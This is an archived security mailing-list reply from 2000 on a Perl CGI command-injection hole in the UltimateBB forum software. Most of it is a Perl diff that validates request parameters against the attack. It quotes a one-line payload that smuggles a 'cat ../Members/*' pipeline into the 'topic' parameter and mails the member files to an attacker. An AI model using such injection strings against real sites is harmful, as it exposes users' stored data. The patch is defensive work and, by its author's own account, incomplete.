Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: Jordan Ritter (jpr5at_private)
Date: Tue Feb 15 2000 - 17:47:40 PST

  • Next message: Charles Capps: "Re: perl-cgi hole in UltimateBB by Infopop Corp."

    On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
    # It works on the full version also...
    # Little different syntax:
    # topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
    # (note the ../ on the Members.  You have to go up a directory to get the
    # file.  Maybe you could stop it via simple folder permissions??)
    Provided with no warranty.  unescape() borrowed from the far superior  It appears to work, but I haven't checked it for completeness.
    The ubb scripts are a programming disaster, and pass around metachars and
    filenames through form parameters, making input validation difficult.
    The patch below selectively validates input based on the name of the
    variable we're validating (i.e. only certain variables are dangerous;
    others are just dumb and not a risk).  It's better to try and validate at
    the top leven then code review the source and try to patch every idiotic
    mistake that was made.  At the very least, this stops the specific attack
    that was posted.  There could be other holes that this doesn't cover, or
    alternative ways to carry out the same attack.  Hopefully Infopop will get
    their act together soon.
    I can't believe they distribute this crap as commercial software.
    Actually, what I can't believe is how many people paid for it.  God help
    us all.
    $ diff
    < # unescape URL-encoded data
    < sub unescape {
    <     shift() if ref($_[0]);
    <     my $todecode = shift;
    <     return undef unless defined($todecode);
    <     $todecode =~ tr/+/ /;       # pluses become spaces
    <     $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
    <     return $todecode;
    < }
    <       # clean input
    <     if ($key =~ /^(forum|topic|number|replynum)$/i) {
    <         my($newval) = &unescape($val);
    <         if ($newval !~ /^([ -\@\w.]+)$/) {
    <             $val = "bad_input";
    <         }
    <     }
    < my(@out);
    < foreach $row (@in) {
    <     my($name,$value) = split ("=", $row);
    <     if ($name =~ /^(forum|topic|number|replynum)$/i) {
    <         my($newvalue) = &unescape($value);
    <         if ($newvalue !~ /^([ -\@\w.]+)$/) {
    <             $value = "bad_input";
    <         }
    <         push @out, "$name=$value";
    <      } else {
    <         push @out, $row;
    <      }
    < }
    <    @in = @out;

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